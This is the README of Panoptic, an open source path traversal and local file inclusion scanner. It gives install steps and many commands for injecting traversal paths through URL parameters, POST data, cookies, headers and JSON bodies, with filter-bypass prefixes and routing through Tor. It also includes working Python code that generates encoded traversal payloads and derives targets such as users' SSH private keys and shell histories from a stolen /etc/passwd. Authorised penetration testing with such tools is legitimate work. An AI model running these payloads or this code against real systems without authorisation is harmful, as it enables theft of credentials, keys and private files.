Panoptic

Panoptic is an open source penetration testing tool that automates the search and retrieval of common log and config files through path traversal vulnerabilities.

Features
- Async concurrent scanning with configurable worker pool (--concurrency)
- Automatic discovery of common log and configuration files via parameter-based, path-based, POST, cookie, header, and JSON body injection
- FUZZ marker for arbitrary injection points: place FUZZ in any --header or --data value
- Base64 encoding for endpoints that decode file paths (--base64)
- Automatic OS detection with option to restrict further scans
- Heuristic response comparison with status code filtering to reduce false positives
- Dynamic case injection: parse /etc/passwd for home directory files, mysql-bin.index for binlog files
- Multiple output formats: text (rich), JSON, CSV (--output-format)
- Resume/checkpoint support for long-running scans (--resume-file)
- TOML config files for persistent settings (--config)
- Multiple traversal bypass techniques: prefixes, postfixes, multiplier, slash replacement, double encoding
- HTTP/HTTPS and SOCKS4/SOCKS5 proxy support with validation
- Random or custom User-Agent, cookie, and header support
- Credential redaction in banner and log output
- Self-update with remote URL verification (--update)
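The "dynamic case injection" feature above means that one retrieved file is parsed to derive further targets. The following is an added example, not Panoptic's own code, of how that derivation can be done for the two files the list names: the seventh-field home directories in /etc/passwd yield per-user files, and each line of mysql-bin.index yields a binlog path (relative entries are resolved against the MySQL datadir). The /etc/passwd and mysql-bin.index contents are constructed samples, and the per-home file list (HOME_FILES) and the datadir default are assumptions for illustration, not the tool's own lists.

```python
"""Added example (not Panoptic's own code): derive new traversal targets from
files already retrieved, i.e. the 'dynamic case' idea from the feature list."""
import posixpath

# Constructed sample of a retrieved /etc/passwd (not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
# a comment line that must be skipped
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
"""

# Constructed sample of a retrieved mysql-bin.index (not from a real host).
SAMPLE_BINLOG_INDEX = """\
/var/lib/mysql/mysql-bin.000001
/var/lib/mysql/mysql-bin.000002
./mysql-bin.000003
"""

# Assumed per-home-directory candidate files; the real tool's list may differ.
HOME_FILES = (".bash_history", ".ssh/id_rsa", ".ssh/authorized_keys",
              ".mysql_history", ".profile")

# Shells that mark accounts which never get an interactive session; their
# home directories rarely hold shell/ssh artefacts, so skip them by default.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd_homes(text, skip_nologin=True):
    """Return the unique, plausible home directories listed in a passwd file."""
    homes = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:            # malformed line, not passwd(5) format
            continue
        home, shell = fields[5], fields[6]
        if skip_nologin and shell in NOLOGIN_SHELLS:
            continue
        if not home.startswith("/") or home in ("/", "/nonexistent"):
            continue
        if home not in homes:           # keep file order, drop duplicates
            homes.append(home)
    return homes


def home_targets(passwd_text, skip_nologin=True):
    """Expand every home directory into the candidate files to request next."""
    return [posixpath.join(home, name)
            for home in parse_passwd_homes(passwd_text, skip_nologin)
            for name in HOME_FILES]


def parse_binlog_index(text, datadir="/var/lib/mysql"):
    """Return absolute binlog paths from a mysql-bin.index file.

    The index lists one log file per line; mysqld writes relative names when
    the log basename is relative, so those are resolved against the datadir
    (the default datadir here is an assumption for the example)."""
    paths = []
    for line in text.splitlines():
        entry = line.strip()
        if not entry:
            continue
        path = posixpath.normpath(posixpath.join(datadir, entry))
        if path not in paths:
            paths.append(path)
    return paths


if __name__ == "__main__":
    for target in home_targets(SAMPLE_PASSWD) + parse_binlog_index(SAMPLE_BINLOG_INDEX):
        print(target)
```

Passing skip_nologin=False keeps service accounts such as www-data, whose home (here /var/www) is the web root and is worth probing for config files even though it will never hold a .bash_history.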
Requirements
- Python 3.10+
- Dependencies: httpx[socks], rich, rich-argparse
Installation
git clone https://github.com/lightos/Panoptic.git
cd Panoptic
pip install -e .
For development:
pip install -e ".[dev]"
Usage
panoptic --url "http://target/include.php?file=test.txt"
Examples
Basic parameter-based LFI
panoptic --url "http://target/include.php?file=test.txt"
panoptic --url "http://target/include.php?file=test.txt&id=1" \
--param file
POST data injection
panoptic --url "http://target/include.php" \
--data "file=test.txt&id=1" --param file
Path-based LFI
panoptic --url "http://target/view.php/test.txt" --path-based
Base64-encoded parameter
panoptic --url "http://target/load.php?file=dGVzdC50eHQ=" \
--base64 --auto
Cookie injection (FUZZ marker)
panoptic --url "http://target/page.php" \
--header "Cookie: lang=FUZZ" --auto
JSON body injection (FUZZ marker)
panoptic --url "http://target/api/load" \
--data '{"file":"FUZZ"}' --auto
Custom header injection (FUZZ marker)
panoptic --url "http://target/page.php" \
--header "X-Template: FUZZ" --auto
Extension parameter
panoptic --url "http://target/view.php?file=test&type=txt" \
--param file --ext-param type
Filter bypass with prefix
panoptic --url "http://target/filtered.php?file=test.txt" \
--prefix "....//....//....//....//"
Filtered scans
panoptic --url "http://target/include.php?file=test.txt" \
--os "*NIX" --type conf
panoptic --url "http://target/include.php?file=test.txt" \
--software PostgreSQL
JSON output with resume support
panoptic --url "http://target/include.php?file=test.txt" \
--output-format json --output-file results.json \
--resume-file scan.checkpoint
Proxy with SSL errors ignored
panoptic --url "https://target/include.php?file=test.txt" \
--proxy "socks5://127.0.0.1:9050" --invalid-ssl
List available filters
panoptic --list software
panoptic --list category
panoptic --list os
Comprehensive scan
panoptic --url "http://target/include.php?file=test.txt" \
--auto --all-versions --concurrency 8
FUZZ Marker
Place FUZZ anywhere in --header or --data values to mark
the injection point. Panoptic replaces FUZZ with each file path
during scanning. This enables testing injection points that
--param can't reach:
| Injection Type | Example |
| -------------- | ---------------------------------------- |
| Cookie value | --header "Cookie: theme=FUZZ" |
| Custom header | --header "X-Include: FUZZ" |
| JSON body | --data '{"template":"FUZZ"}' |
| Nested value | --header "Cookie: sid=abc; lang=FUZZ" |
When FUZZ is present, --param is not required.
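The following is an added example, not Panoptic's own code, showing the two mechanics this section and the feature list describe: generating traversal variants with the listed bypass techniques (prefix, postfix, multiplier, slash replacement, double encoding), and placing each variant either at a FUZZ marker in a header or body value or into a named URL/form parameter when no marker is present. Function names, the "%00" postfix and the "....//" prefix used in the test are illustrative assumptions; the sample URLs, headers and bodies are constructed and mirror the ones in the Examples section.

```python
"""Added example (not Panoptic's own code): traversal payload variants and
FUZZ/parameter injection, as a scanner like the one described would do it."""
from itertools import product
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit

FUZZ = "FUZZ"


def traversal_payloads(target, depths=(6,), prefixes=("",), postfixes=("",),
                       slash_replacements=("/",), double_encode=False):
    """Return unique payload strings for one absolute target path.

    depths            multiplier: how many "../" segments to prepend
    prefixes          e.g. "....//" for filters that strip one "../" pass
    postfixes         e.g. "%00" for null-byte truncation on old runtimes
    slash_replacements  alternative separators such as "\\" or "%2f"
    double_encode     percent-encode twice for a decode-then-decode chain
    """
    rel = target.lstrip("/")
    seen, out = set(), []
    for depth, pre, post, sep in product(depths, prefixes, postfixes,
                                         slash_replacements):
        payload = pre + "../" * depth + rel + post
        if sep != "/":
            payload = payload.replace("/", sep)
        if double_encode:
            # quote() leaves letters, digits, "._-~" alone, so only the
            # separators (and any existing "%") are encoded, twice.
            payload = quote(quote(payload, safe=""), safe="")
        if payload not in seen:
            seen.add(payload)
            out.append(payload)
    return out


def _set_pair(query, param, payload):
    """Replace the value of `param` in a query/form string, keeping the rest."""
    pairs = parse_qsl(query, keep_blank_values=True)
    if param not in dict(pairs):
        raise ValueError(f"parameter {param!r} not present in {query!r}")
    pairs = [(k, payload if k == param else v) for k, v in pairs]
    # "/" and "%" are kept literal so pre-encoded payloads are sent as built;
    # the HTTP client must not re-encode the query string afterwards.
    return urlencode(pairs, safe="/%")


def inject_url_param(url, param, payload):
    """Return `url` with the value of query parameter `param` replaced."""
    parts = urlsplit(url)
    return urlunsplit(parts._replace(query=_set_pair(parts.query, param, payload)))


def build_request(payload, url, param=None, headers=None, data=None):
    """Place `payload` at every FUZZ marker, or into `param` if there is none.

    Returns (url, headers, data) ready for an HTTP client. Mirrors the rule
    that --param is only required when no FUZZ marker is present."""
    headers = dict(headers or {})
    hit = False
    for name, value in headers.items():
        if FUZZ in value:
            headers[name] = value.replace(FUZZ, payload)
            hit = True
    if data is not None and FUZZ in data:
        data = data.replace(FUZZ, payload)      # form or JSON body alike
        hit = True
    if hit:
        return url, headers, data
    if param is None:
        raise ValueError("no FUZZ marker found and no parameter named")
    if data is not None:                         # POST form data + --param
        return url, headers, _set_pair(data, param, payload)
    return inject_url_param(url, param, payload), headers, data


if __name__ == "__main__":
    for p in traversal_payloads("/etc/passwd", depths=(4,),
                                prefixes=("", "....//"),
                                slash_replacements=("/", "\\")):
        print(build_request(p, "http://target/page.php",
                            headers={"Cookie": "sid=abc; lang=FUZZ"}))
```

Each variant is sent separately; a scanner then compares the responses against a baseline (the "heuristic response comparison" in the feature list) rather than trusting status codes alone, because many include handlers return 200 with an error page for a missing file.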
Configuration
Panoptic supports TOML config files for persistent settings:
panoptic --url "http://target/include.php?file=test.txt" \
--config ~/.config/panoptic/config.toml
Default config location: ~/.config/panoptic/config.toml
[defaults]
concurrency = 8
verbose = true
automatic = true
[proxy]
url = "socks5://127.0.0.1:9050"
[headers]
user_agent = "Mozilla/5.0"
Priority: CLI args > config file > built-in defaults.
Contributing
Contributions are welcome! Please open issues or pull requests on GitHub.
License
This project is licensed under the MIT License - see the LICENSE file for details.